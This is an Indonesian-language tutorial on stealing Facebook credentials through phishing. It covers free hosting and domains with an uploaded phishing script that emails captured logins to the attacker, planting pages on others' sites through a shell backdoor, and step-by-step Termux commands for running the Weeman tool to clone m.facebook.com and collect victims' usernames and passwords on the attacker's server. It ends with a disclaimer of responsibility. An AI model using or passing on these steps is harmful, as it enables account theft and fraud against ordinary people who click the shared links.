Ada tiga (3) methode yang akan saya bahas disini :
1. Membuat phising dengan hosting domain gratisan.
Kenapa saya bilang gratisan ? ya tentu siapa juga yang mau berbayar untuk hal sekecil ini, disini yang kita incar hanyalah sebuah akun facebook.
beberapa penyedia hosting gratis antara lain :
> https://www.freehostia.com
> http://byethost5.com
> https://byet.host
> https://infinityfree.net
> https://x10hosting.com
Selengkapnya kalian bisa chek disini https://ghostbin.com/paste/8trh4
untuk penyedia domain gratis antara lain https://get.ooo https://freenom.com
Download Script Phishing Facebook True Login
Jangan lupa mengubah ns (name server) domain sesuai hosting kalian agar
bisa terhubung nantinya, selanjutnya upload script phising nya dan
jangan lupa ubah email penerimanya di bagian email.com.php, ubah dengan
email kalian ya. Selesai tinggal tebar ataupun spam ke teman kalian
Untuk kalian kalangan defacer maupun carder pasti sudah tidak asing lagi dengan yang namanya shell backdoor, Sama seperti saat melakukan defacing. Kita meng upload script phising kita melalui shell backdoor. keuntunganya kita tidak perlu repot-repot membuat sebuah hosting ataupun domain. bisa di bilang kita numpang script di web orang.
Untuk methode ini saya tidak akan membahasnya karena kalian pasti akan terfikir sendiri.
3. Menggunakan Weeman tools di Android
Untuk source nya kalian bisa lihat disini https://github.com/evait-security/weeman
Tutorialnya :
Buka termux kalian atau yang belum punya kalian bisa download disini
Lakukan update dan upgrade terlebih dahulu dengan perintah :
apt-get update && apt-get upgrade
Kemudian install git dan python nya :apt-get install git
apt-get install python2
kemudian cloning source weeman nya denga perintah :git clone https://github.com/evait-security/weeman.git
cd weeman
Sebelumnya buka terlebih dahulu halaman terminal (termux) yang baru kemudian ketikanifconfig
Catatan : Gunakanlan wifi untuk meminimalisir kegagalanPerintah ifconfig ini untuk melihat IP yang di berikan router wifi ke hp kita. contohnya 192.168.X.X
Catat ataupun ingat IP kalian karena ini merupakan kunci keberhasilan methode ini.
Tahap eksekusi ketikan perintah :
python weeman.py
set url https://m.facebook.com
kenapa menggunakan m.facebook.com bukan facebook.com saja ? Pada
intinya target kita pastinya menggunakan hp, tujuanya agar tampilanya
mobile
setelah itu ketikan perintah :
set action_url http://192.168.X.X
di bagian 192.168.X.X ubah dengan IP kalian. disinilah sering
terjadi kesalahan fatal yang sering menyebabkan kegagalan dalam
eksekusi. jika kalian tadi mengisi dengan set action_url
https://facebook.com memang tidak akan error namun, akan berjalan secara
default di localhost.
set port kalian dengan perintah :
set port 8080
kenapa harus memakai port ? port ini gerbang masuknya data. jadi
sama halnya jika kalian punya rumah terus gak ada pintunya terus mau
masuk lewat mana ? jendela gitu ? entar di teriakin maling hehee. So
lewat ini user pass korban (target) di kirimkan
Saatnya menjalankan fake server kalian denga perintah :
run
Untuk mengechek fake server kalian jalan nggak nya. kalian bisa
coba di browser kalian dengan menuliskan IPsendiri:8080 di bagian url.
Jika berhasil maka tampilanya akan sama seperti halaman facebook.
Tinggal share link tersebut ke target/korban. dan jika target login
maka secara otomatis akan terkirim ke fake server localhost kalian.
Mungkin itu saja yang bisa saya jelaskan. Sekian untuk artikel yang
tidak jelas ini semoga bisa bermanfaat dan ambil pelajaranya saja, Saya
tidak bertanggung jawab jika ada suatu hal yang terjadi nantinya .
